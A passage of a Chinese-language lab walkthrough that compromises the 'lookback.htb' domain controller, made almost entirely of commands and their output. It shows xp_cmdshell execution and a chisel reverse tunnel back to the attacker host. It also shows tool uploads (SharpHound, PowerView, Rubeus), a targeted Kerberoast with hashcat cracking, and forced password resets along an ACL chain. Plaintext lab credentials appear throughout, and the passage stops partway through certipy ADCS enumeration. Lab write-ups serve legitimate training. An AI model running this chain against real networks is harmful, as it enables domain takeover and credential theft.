SQL (lookback\lookback-admin  dbo@lookback)> EXEC xp_cmdshell 'whoami';
8
output
9
-----------------
10
lookback\db-admin
11
NULL

建立隧道

需要将域内端口转发出来

Kali

尝试了下其它端口发现没有回连

1
/usr/bin/chisel server --reverse --socks5 -p 445 -v

MSSQL

upload

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file /home/kali/Desktop/tools/chisel/chisel.exe C:\\ProgramData\\chisel.exx
3
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
4
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
5
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/chisel/chisel.exe to C:\ProgramData\chisel.exe
6
MSSQL       172.16.55.128   1433   DC01             [*] Size is 10612224 bytes
7
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

run

1
SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'cmd /c taskkill /F /IM chisel.exe';
2
output
3
------------------------------------------
4
ERROR: The process "chisel.exe" not found.
5
NULL
6
SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'powershell -NoP -W Hidden -Command "Start-Process -FilePath ''C:\ProgramData\chisel.exe'' -ArgumentList ''client 172.16.55.193:445 R:socks'' -WindowStyle Hidden"';
7
output
8
------
9
NULL

Sharphound

upload

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file '/home/kali/Desktop/tools/sharphound/SharpHound_v2.9.0/SharpHound.ps1' 'C:\Users\db-admin\Desktop\SharpHound.ps1'
3
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
4
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
5
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/sharphound/SharpHound_v2.9.0/SharpHound.ps1 to C:\Users\db-admin\Desktop\SharpHound.ps1
6
MSSQL       172.16.55.128   1433   DC01             [*] Size is 1618189 bytes
7
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

run

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# impacket-mssqlclient 'lookback.htb/lookback-admin:iPmmhn8bguFcWin9@172.16.55.128' -windows-auth <<SQL
3
EXEC xp_cmdshell 'if not exist C:\Users\db-admin\Desktop\bh_out mkdir C:\Users\db-admin\Desktop\bh_out';
4
EXEC xp_cmdshell 'powershell -NoP -Ep Bypass -Command "Import-Module ''C:\Users\db-admin\Desktop\SharpHound.ps1''; Invoke-BloodHound -CollectionMethod All -Domain lookback.htb -OutputDirectory C:\Users\db-admin\Desktop\bh_out -ZipFileName 20260410_lookback.zip"';
5
EXEC xp_cmdshell 'dir C:\Users\db-admin\Desktop\bh_out';
6
SQL
7
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
8

9
[*] Encryption required, switching to TLS
10
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
11
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
12
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
13
[*] INFO(dc01): Line 1: Changed database context to 'master'.
14
[*] INFO(dc01): Line 1: Changed language setting to us_english.
15
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
16
[!] Press help for extra shell commands
17
SQL (lookback\lookback-admin  dbo@master)> output
18
------
19
NULL
20
SQL (lookback\lookback-admin  dbo@master)>

download

需要等一小会脚本运行完毕

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --get-file 'C:\Users\db-admin\Desktop\bh_out\20260410_lookback.zip' '/home/kali/Desktop/hmv/lookback/loot/20260410_lookback.zip'
3
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
4
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
5
MSSQL       172.16.55.128   1433   DC01             [*] Copying "C:\Users\db-admin\Desktop\bh_out\20260410_lookback.zip" to "/home/kali/Desktop/hmv/lookback/loot/20260410_lookback.zip"
6
MSSQL       172.16.55.128   1433   DC01             [+] File "C:\Users\db-admin\Desktop\bh_out\20260410_lookback.zip" was downloaded to "/home/kali/Desktop/hmv/lookback/loot/20260410_lookback.zip"

Bloodhound

DB-ADMIN@LOOKBACK.HTB

IT-SEC-ADMIN@LOOKBACK.HTB

IT-ADMIN@LOOKBACK.HTB

攻击链

清晰得不能再清晰了db-admin -> IT-SEC-admin -> IT-admin -> IT-login-user

ACL 链式攻击

DB-ADMIN -> IT-SEC-ADMIN（定向 Kerberoast）

思路：给 IT-SEC-admin 临时加可烤 SPN，取票后离线爆破。
得到：IT-SEC-admin : <REDACTED_ITSEC_ADMIN_PASSWORD>

PowerView

upload

1
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
2
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file '/home/kali/Desktop/tools/PowerSploit/PowerView.ps1' 'C:\Users\db-admin\Desktop\PowerView.ps1'
3
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
4
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
5
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\db-admin\Desktop\PowerView.ps1
6
MSSQL       172.16.55.128   1433   DC01             [*] Size is 770271 bytes
7
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

添加 SPN

1
SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'powershell -NoP -Ep Bypass -Command "& { . C:\Users\db-admin\Desktop\PowerView.ps1; Get-DomainUser -Identity IT-SEC-admin | fl samaccountname,serviceprincipalname; Set-DomainObject -Identity IT-SEC-admin -Set @{servicePrincipalName=''http/itsec-admin''}; Get-DomainUser -Identity IT-SEC-admin | fl samaccountname,serviceprincipalname }"'
2
output
3
---------------------------------------
4
NULL
5
NULL
6
samaccountname : IT-SEC-admin
7
NULL
8
NULL
9
NULL
10
NULL
11
NULL
12
samaccountname       : IT-SEC-admin
13
serviceprincipalname : http/itsec-admin
14
NULL
15
NULL
16
NULL
17
NULL

Rubeus

upload

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file '/home/kali/Desktop/tools/Rubeus/2.2.0/Rubeus2.2.exe' 'C:\Users\db-admin\Desktop\Rubeus.exe'
3
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
4
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
5
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/Rubeus/2.2.0/Rubeus2.2.exe to C:\Users\db-admin\Desktop\Rubeus.exe
6
MSSQL       172.16.55.128   1433   DC01             [*] Size is 446976 bytes
7
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

run

1
SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'C:\Users\db-admin\Desktop\Rubeus.exe kerberoast /user:IT-SEC-admin /simple /nowrap /outfile:C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash';
2
output
3
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4
NULL
5
   ______        _
6
  (_____ \      | |
7
   _____) )_   _| |__  _____ _   _  ___
8
  |  __  /| | | |  _ \| ___ | | | |/___)
9
  | |  \ \| |_| | |_) ) ____| |_| |___ |
10
  |_|   |_|____/|____/|_____)____/(___/
11
NULL
12
  v2.2.0
13
NULL
14
NULL
15
[*] Action: Kerberoasting
16
NULL
17
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
18
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
19
NULL
20
[*] Target User            : IT-SEC-admin
21
[*] Target Domain          : lookback.htb
22
[*] Searching path 'LDAP://dc01.lookback.htb/DC=lookback,DC=htb' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=IT-SEC-admin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
23
NULL
24
[*] Total kerberoastable users : 1
25
NULL
26
[*] Hash written to C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash
27
NULL
28
[*] Roasted hashes written to : C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash
29
NULL

Gethash

1
SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'type C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash';
2
output
3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4
$krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-admin@lookback.htb*$15B2938BBB018EC0B10522526A1E3CA6$AEF2D06442E183BD6D32B3705B7556EA18ABDD06DDEEB448E9A49E4E1AE21CA823BFC1E57A26B02FCE1B6C107CBEFBE96BF5E6175DFF88A55B1C9075A0ACAF058589FF0B07805FF68849D657
5
96DC9FB7B3A9CCEE249068950BF5F838685AA2449D5E8E4A88A75C0A7521177108ADA00B65A6F6AACA6E59972D4F9F3582A5C606D5DDA154E232E0563971C97F37071995147BDE8BBBF29D295FB8549F13961C7A781AD02C8D20D9996954336F82D5DA0C4E42097191D8D71A6617C7ED4933B2E0FF7F3006B97FD2E3399577A
6
61B11A2398026511604DB6B818C494ABEFC5C734B79D8BBBE7EC917137D3060A423E3714533EFABD76401977CB66D19C2DD435B4218B4DE2DF76925C4EDD2D94E6FF886ABCCCAC5234ECFF7D51D622DCDA5CA2EDECE98AA7D8DA59FD7F8296E5B619A9BF9D4183CFC5708280FB8CCF21B8A9F4B0D552BB6A3C78A0859060A35
7
C34E17C21AD37DD10D2898D78EDEF8E8D48423B79BD915012E77F8A74EC2C61D75CD44BB7F903B47343730F34BEAEE6CAC2758BE44A13B026A48571BBA8C0AB4A7087466C8F611C08608D2294EEBC57C9B0C5661470AEEA820E1616D551F96BAA6D32E9A5631B5C9C5FCE8C0A38C47D2C072DFB0F6A3A418F0675B7F66F6221
8
EC2A53C92179FAB9D3E49B096AEC18461E0CBB92730034E4C835B192D3BD3855C4683EAE38F990A2C5C1834F158BDE4AF684D6E66D8C9EC1ACD9CFDB4130053D3DEC7473554B7568F94663104C67161E1B1A7BBC5221D5A44D8F63E612477EB8D610DD53773BAC09DE0F47F46588AE2BE7C052A6070FF74743DE1B3B9CAB7FF
9
6550771D358E6586E6E5F098A7E2ED38CF17DD13AF77224BE4D195E0D084043386854C64837AC941D837BD884692ACC2F55E2723957944913C88628193AE567D34BA79A8142329B39FF0E8786217293D9C40385D17104698C866FE7F69EC076E99E60612704FFC5B9B076B09D46C92F3DA9F8A37C1CB3E6EB9CC6B1FC9E7D4B
10
7C3BD56996FED0E8424E78A8D749EE56D44EFD0BB893B9203D107F5FD8427BF71218D713BD4F4FC11102131CD79A3A1CC94150B7F36C6F224F360C8A81DC072FB094B43B6237C84D78549A85E91DFB39DFB4CB9938EC62BECBC16D5A8885E8857703AF25054737DB87738E6A78A384A4F18640D52F3250489FD0F6EBFCD39DC
11
BA85ED1CA86FB97254C05EBDA575F790F6502A2C07CC52BDC49B1C5118513D06B453460BEA7606A32F1BD602C714451E837DC6B829A8FD586072634B84158FA136B0B0E75CBD040BB686D56BECEEA9F25C19FB2B5DAB9F514D91805CCE95A191E6B6601D7FC91FB6D56D386B53890E0A1FE2C592ED4D0A755B19196F944C551
12
F3B08D08635F5256B7B442D18D21D26EB7E0314104750F51CCBBF5BA235879D3BD6A5990C540E91FD65011892804709D7F8FF7071F40E6D9E11A9649499CAE1EA753FFA28FC87038BBEE09DF813EAA24D7BEFD258FF383620C8A693A6666F1091E01FBCB534C74782D5AAECAEC5A6090B4921527ECAA99FFEB316F0956B33A1
13
0D489CB09385391B1430CAB31A63952C5CFA7B86920F6B
14
NULL

Hashcat

得到凭据itsec-admin/butterfly

1
echo '$krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-admin@lookback.htb*$15B2938BBB018EC0B10522526A1E3CA6$AEF2D06442E183BD6D32B3705B7556EA18ABDD06DDEEB448E9A49E4E1AE21CA823BFC1E57A26B02FCE1B6C107CBEFBE96BF5E6175DFF88A55B1C9075A0ACAF058589FF0B07805FF68849D65796DC9FB7B3A9CCEE249068950BF5F838685AA2449D5E8E4A88A75C0A7521177108ADA00B65A6F6AACA6E59972D4F9F3582A5C606D5DDA154E232E0563971C97F37071995147BDE8BBBF29D295FB8549F13961C7A781AD02C8D20D9996954336F82D5DA0C4E42097191D8D71A6617C7ED4933B2E0FF7F3006B97FD2E3399577A61B11A2398026511604DB6B818C494ABEFC5C734B79D8BBBE7EC917137D3060A423E3714533EFABD76401977CB66D19C2DD435B4218B4DE2DF76925C4EDD2D94E6FF886ABCCCAC5234ECFF7D51D622DCDA5CA2EDECE98AA7D8DA59FD7F8296E5B619A9BF9D4183CFC5708280FB8CCF21B8A9F4B0D552BB6A3C78A0859060A35C34E17C21AD37DD10D2898D78EDEF8E8D48423B79BD915012E77F8A74EC2C61D75CD44BB7F903B47343730F34BEAEE6CAC2758BE44A13B026A48571BBA8C0AB4A7087466C8F611C08608D2294EEBC57C9B0C5661470AEEA820E1616D551F96BAA6D32E9A5631B5C9C5FCE8C0A38C47D2C072DFB0F6A3A418F0675B7F66F6221EC2A53C92179FAB9D3E49B096AEC18461E0CBB92730034E4C835B192D3BD3855C4683EAE38F990A2C5C1834F158BDE4AF684D6E66D8C9EC1ACD9CFDB4130053D3DEC7473554B7568F94663104C67161E1B1A7BBC5221D5A44D8F63E612477EB8D610DD53773BAC09DE0F47F46588AE2BE7C052A6070FF74743DE1B3B9CAB7FF6550771D358E6586E6E5F098A7E2ED38CF17DD13AF77224BE4D195E0D084043386854C64837AC941D837BD884692ACC2F55E2723957944913C88628193AE567D34BA79A8142329B39FF0E8786217293D9C40385D17104698C866FE7F69EC076E99E60612704FFC5B9B076B09D46C92F3DA9F8A37C1CB3E6EB9CC6B1FC9E7D4B7C3BD56996FED0E8424E78A8D749EE56D44EFD0BB893B9203D107F5FD8427BF71218D713BD4F4FC11102131CD79A3A1CC94150B7F36C6F224F360C8A81DC072FB094B43B6237C84D78549A85E91DFB39DFB4CB9938EC62BECBC16D5A8885E8857703AF25054737DB87738E6A78A384A4F18640D52F3250489FD0F6EBFCD39DCBA85ED1CA86FB97254C05EBDA575F790F6502A2C07CC52BDC49B1C5118513D06B453460BEA7606A32F1BD602C714451E837DC6B829A8FD586072634B84158FA136B0B0E75CBD040BB686D56BECEEA9F25C19FB2B5DAB9F514D91805CCE95A191E6B6601D7FC91FB6D56D386B53890E0A1FE2C592ED4D0A755B19196F944C551F3B08D08635F5256B7B442D18D21D26EB7E0314104750F51CCBBF5BA235879D3BD6A5990C540E91FD65011892804709D7F8FF7071F40E6D9E11A9649499CAE1EA753FFA28FC87038BBEE09DF813EAA24D7BEFD258FF383620C8A693A6666F1091E01FBCB534C74782D5AAECAEC5A6090B4921527ECAA99FFEB316F0956B33A10D489CB09385391B1430CAB31A63952C5CFA7B86920F6B' > itsec.hash

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# hashcat -m 13100 itsec.hash /usr/share/wordlists/rockyou.txt --force
3
hashcat (v7.1.2) starting
4

5
You have enabled --force to bypass dangerous warnings and errors!
6
This can hide serious problems and should only be done when debugging.
7
Do not report hashcat issues encountered when using --force.
8

9
Host memory allocated for this attack: 513 MB (2151 MB free)
10

11
Dictionary cache hit:
12
* Filename..: /usr/share/wordlists/rockyou.txt
13
* Passwords.: 14344385
14
* Bytes.....: 139921507
15
* Keyspace..: 14344385
16

17
$krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-admin@lookback.htb*$15b2938bbb018ec0b10522526a1e3ca6$aef2d06442e183bd6d32b3705b7556ea18abdd06ddeeb448e9a49e4e1ae21ca823bfc1e57a26b02fce1b6c107cbefbe96bf5e6175dff88a55b1c9075a0acaf058589ff0b07805ff68849d65796dc9fb7b3a9ccee249068950bf5f838685aa2449d5e8e4a88a75c0a7521177108ada00b65a6f6aaca6e59972d4f9f3582a5c606d5dda154e232e0563971c97f37071995147bde8bbbf29d295fb8549f13961c7a781ad02c8d20d9996954336f82d5da0c4e42097191d8d71a6617c7ed4933b2e0ff7f3006b97fd2e3399577a61b11a2398026511604db6b818c494abefc5c734b79d8bbbe7ec917137d3060a423e3714533efabd76401977cb66d19c2dd435b4218b4de2df76925c4edd2d94e6ff886abcccac5234ecff7d51d622dcda5ca2edece98aa7d8da59fd7f8296e5b619a9bf9d4183cfc5708280fb8ccf21b8a9f4b0d552bb6a3c78a0859060a35c34e17c21ad37dd10d2898d78edef8e8d48423b79bd915012e77f8a74ec2c61d75cd44bb7f903b47343730f34beaee6cac2758be44a13b026a48571bba8c0ab4a7087466c8f611c08608d2294eebc57c9b0c5661470aeea820e1616d551f96baa6d32e9a5631b5c9c5fce8c0a38c47d2c072dfb0f6a3a418f0675b7f66f6221ec2a53c92179fab9d3e49b096aec18461e0cbb92730034e4c835b192d3bd3855c4683eae38f990a2c5c1834f158bde4af684d6e66d8c9ec1acd9cfdb4130053d3dec7473554b7568f94663104c67161e1b1a7bbc5221d5a44d8f63e612477eb8d610dd53773bac09de0f47f46588ae2be7c052a6070ff74743de1b3b9cab7ff6550771d358e6586e6e5f098a7e2ed38cf17dd13af77224be4d195e0d084043386854c64837ac941d837bd884692acc2f55e2723957944913c88628193ae567d34ba79a8142329b39ff0e8786217293d9c40385d17104698c866fe7f69ec076e99e60612704ffc5b9b076b09d46c92f3da9f8a37c1cb3e6eb9cc6b1fc9e7d4b7c3bd56996fed0e8424e78a8d749ee56d44efd0bb893b9203d107f5fd8427bf71218d713bd4f4fc11102131cd79a3a1cc94150b7f36c6f224f360c8a81dc072fb094b43b6237c84d78549a85e91dfb39dfb4cb9938ec62becbc16d5a8885e8857703af25054737db87738e6a78a384a4f18640d52f3250489fd0f6ebfcd39dcba85ed1ca86fb97254c05ebda575f790f6502a2c07cc52bdc49b1c5118513d06b453460bea7606a32f1bd602c714451e837dc6b829a8fd586072634b84158fa136b0b0e75cbd040bb686d56beceea9f25c19fb2b5dab9f514d91805cce95a191e6b6601d7fc91fb6d56d386b53890e0a1fe2c592ed4d0a755b19196f944c551f3b08d08635f5256b7b442d18d21d26eb7e0314104750f51ccbbf5ba235879d3bd6a5990c540e91fd65011892804709d7f8ff7071f40e6d9e11a9649499cae1ea753ffa28fc87038bbee09df813eaa24d7befd258ff383620c8a693a6666f1091e01fbcb534c74782d5aaecaec5a6090b4921527ecaa99ffeb316f0956b33a10d489cb09385391b1430cab31a63952c5cfa7b86920f6b:butterfly
18

19
Session..........: hashcat
20
Status...........: Cracked
21
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
22
Hash.Target......: $krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-a...920f6b
23
Time.Started.....: Sat Apr 11 13:17:13 2026, (0 secs)
24
Time.Estimated...: Sat Apr 11 13:17:13 2026, (0 secs)
25
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
26
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
27
Guess.Queue......: 1/1 (100.00%)
28
Speed.#01........:   698.1 kH/s (2.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
29
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
30
Progress.........: 4096/14344385 (0.03%)
31
Rejected.........: 0/4096 (0.00%)
32
Restore.Point....: 0/14344385 (0.00%)
33
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
34
Candidate.Engine.: Device Generator
35
Candidates.#01...: 123456 -> oooooo
36
Hardware.Mon.#01.: Util: 28%

IT-SEC-admin -> IT-admin（改密）

rpcclinet

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# rpcclient -U 'lookback.htb/IT-SEC-admin%butterfly' 172.16.55.128 -c "setuserinfo2 IT-admin 23 'V9bT6itAdmin2026'"

netexec

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026'
3

4
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
5
SMB         172.16.55.128   445    DC01             [+] lookback.htb\IT-admin:V9bT6itAdmin2026

步骤 1：将 `IT-login-user` 的所有者设置为 `IT-admin`

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' set owner IT-login-user IT-admin
3
[+] Old owner S-1-5-21-3830242231-3868280746-2763890440-512 is now replaced by IT-admin on IT-login-user

作用：使 IT-admin 成为 IT-login-user 对象的所有者。
权限要求：IT-admin 需要对目标对象有 WriteOwner 权限（或更高）。
攻击意义：所有者自动获得对对象的 WriteDacl 权限，为下一步授予 GenericAll 铺路。

步骤 2：授予 `IT-admin` 对 `IT-login-user` 的完全控制权 (`GenericAll`)

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' add genericAll IT-login-user IT-admin
3
[+] IT-admin has now GenericAll on IT-login-user

作用：赋予 IT-admin 对 IT-login-user 对象的完全控制（包括重置密码、修改属性等）。
前置条件：步骤 1 成功后，IT-admin 作为所有者可以修改 DACL，因此此命令应能执行成功。

步骤 3：强制重置 `IT-login-user` 的密码

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' set password IT-login-user 'ITLogin!2026#Qw'
3
[+] Password changed successfully!

作用：将 IT-login-user 的密码改为 ITLogin!2026#Qw。
权限要求：需要 GenericAll 或 User-Force-Change-Password 扩展权限。步骤 2 已授予完全控制，故可成功。

步骤 4：验证新凭据是否有效（SMB 登录）

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nxc smb 172.16.55.128 -d lookback.htb -u IT-login-user -p 'ITLogin!2026#Qw'
3
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
4
SMB         172.16.55.128   445    DC01             [+] lookback.htb\IT-login-user:ITLogin!2026#Qw

certipy

根据 certipy find 的输出，我们发现了一个高价值漏洞模板：**SubCA**（模板索引 17）。该模板满足 ESC1、ESC2、ESC3 和 ESC15 的条件，且已启用。最关键的是，它允许 Enrollee Supplies Subject（请求者指定主题别名），并且支持 Client Authentication 扩展密钥用途。这意味着我们可以通过指定 UPN 为 administrator@lookback.htb 来申请一张代表域管理员的证书，进而通过 Kerberos PKINIT 获取高权限票据

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q certipy find -u 'Administrator @lookback.htb' -p 'ITLogin!2026#Qw' -dc-ip 172.16.55.128 -vulnerable -stdout
3
Certipy v5.0.4 - by Oliver Lyak (ly4k)
4

5
[*] Finding certificate templates
6
[*] Found 35 certificate templates
7
[*] Finding certificate authorities
8
[*] Found 1 certificate authority
9
[*] Found 12 enabled certificate templates
10
[*] Finding issuance policies
11
[*] Found 17 issuance policies
12
[*] Found 0 OIDs linked to templates
13
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.
14
[!] Use -debug to print a stacktrace
15
[*] Retrieving CA configuration for 'lookback-DC01-CA' via RRP
16
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
17
[*] Successfully retrieved CA configuration for 'lookback-DC01-CA'
18
[*] Checking web enrollment for CA 'lookback-DC01-CA' @ 'dc01.lookback.htb'
19
[!] Error checking web enrollment: [Errno 111] Connection refused
20
[!] Use -debug to print a stacktrace
21
[!] Error checking web enrollment: [Errno 111] Connection refused
22
[!] Use -debug to print a stacktrace
23
[*] Enumeration output:
24
Certificate Authorities
25
  0
26
    CA Name                             : lookback-DC01-CA
27
    DNS Name                            : dc01.lookback.htb
28
    Certificate Subject                 : CN=lookback-DC01-CA, DC=lookback, DC=htb
29
    Certificate Serial Number           : 4D974861E25474B44FA1690AA7067B52
30
    Certificate Validity Start          : 2025-10-19 13:42:34+00:00
31
    Certificate Validity End            : 2030-10-19 13:52:33+00:00
32
    Web Enrollment
33
      HTTP
34
        Enabled                         : False
35
      HTTPS
36
        Enabled                         : False
37
    User Specified SAN                  : Disabled
38
    Request Disposition                 : Issue
39
    Enforce Encryption for Requests     : Enabled
40
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
41
    Permissions
42
      Owner                             : LOOKBACK.HTB\Administrators
43
      Access Rights
44
        ManageCa                        : LOOKBACK.HTB\Administrators
45
                                          LOOKBACK.HTB\Domain Admins
46
                                          LOOKBACK.HTB\Enterprise Admins
47
        ManageCertificates              : LOOKBACK.HTB\Administrators
48
                                          LOOKBACK.HTB\Domain Admins
49
                                          LOOKBACK.HTB\Enterprise Admins
50
        Enroll                          : LOOKBACK.HTB\Authenticated Users
51
    [+] User Enrollable Principals      : LOOKBACK.HTB\Authenticated Users
52
    [+] User ACL Principals             : LOOKBACK.HTB\Domain Admins
53
                                          LOOKBACK.HTB\Administrators
54
                                          LOOKBACK.HTB\Enterprise Admins
55
    [!] Vulnerabilities
56
      ESC7                              : User has dangerous permissions.
57
Certificate Templates
58
  0
59
    Template Name                       : IT-login
60
    Display Name                        : IT-login
61
    Certificate Authorities             : lookback-DC01-CA
62
    Enabled                             : True
63
    Client Authentication               : True
64
    Enrollment Agent                    : False
65
    Any Purpose                         : False
66
    Enrollee Supplies Subject           : False
67
    Certificate Name Flag               : SubjectAltRequireEmail
68
                                          SubjectRequireCommonName
69
    Enrollment Flag                     : AutoEnrollment
70
    Extended Key Usage                  : Client Authentication
71
                                          KDC Authentication
72
                                          Smart Card Logon
73
    Requires Manager Approval           : False
74
    Requires Key Archival               : False
75
    Authorized Signatures Required      : 0
76
    Schema Version                      : 2
77
    Validity Period                     : 1 year
78
    Renewal Period                      : 6 weeks
79
    Minimum RSA Key Length              : 2048
80
    Template Created                    : 2025-10-19T14:00:38+00:00
81
    Template Last Modified              : 2025-10-19T14:00:39+00:00
82
    Permissions
83
      Enrollment Permissions
84
        Enrollment Rights               : LOOKBACK.HTB\IT
85
                                          LOOKBACK.HTB\Domain Admins
86
                                          LOOKBACK.HTB\Domain Computers
87
                                          LOOKBACK.HTB\Enterprise Admins
88
      Object Control Permissions
89
        Owner                           : LOOKBACK.HTB\Administrator
90
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
91
                                          LOOKBACK.HTB\Enterprise Admins
92
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
93
                                          LOOKBACK.HTB\Enterprise Admins
94
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
95
                                          LOOKBACK.HTB\Enterprise Admins
96
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
97
                                          LOOKBACK.HTB\Domain Computers
98
                                          LOOKBACK.HTB\Enterprise Admins
99
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
100
                                          LOOKBACK.HTB\Domain Computers
101
                                          LOOKBACK.HTB\Enterprise Admins
102
    [+] User ACL Principals             : LOOKBACK.HTB\Administrator
103
    [!] Vulnerabilities
104
      ESC4                              : Template is owned by user.
105
  1
106
    Template Name                       : login
107
    Display Name                        : login
108
    Enabled                             : False
109
    Client Authentication               : True
110
    Enrollment Agent                    : False
111
    Any Purpose                         : False
112
    Enrollee Supplies Subject           : False
113
    Certificate Name Flag               : SubjectAltRequireEmail
114
                                          SubjectRequireCommonName
115
    Enrollment Flag                     : AutoEnrollment
116
    Extended Key Usage                  : Smart Card Logon
117
                                          KDC Authentication
118
                                          Client Authentication
119
    Requires Manager Approval           : False
120
    Requires Key Archival               : False
121
    Authorized Signatures Required      : 0
122
    Schema Version                      : 2
123
    Validity Period                     : 1 year
124
    Renewal Period                      : 6 weeks
125
    Minimum RSA Key Length              : 2048
126
    Template Created                    : 2025-10-19T13:58:21+00:00
127
    Template Last Modified              : 2025-10-19T13:59:46+00:00
128
    Permissions
129
      Enrollment Permissions
130
        Enrollment Rights               : LOOKBACK.HTB\IT
131
                                          LOOKBACK.HTB\Domain Admins
132
                                          LOOKBACK.HTB\Domain Computers
133
                                          LOOKBACK.HTB\Enterprise Admins
134
      Object Control Permissions
135
        Owner                           : LOOKBACK.HTB\Administrator
136
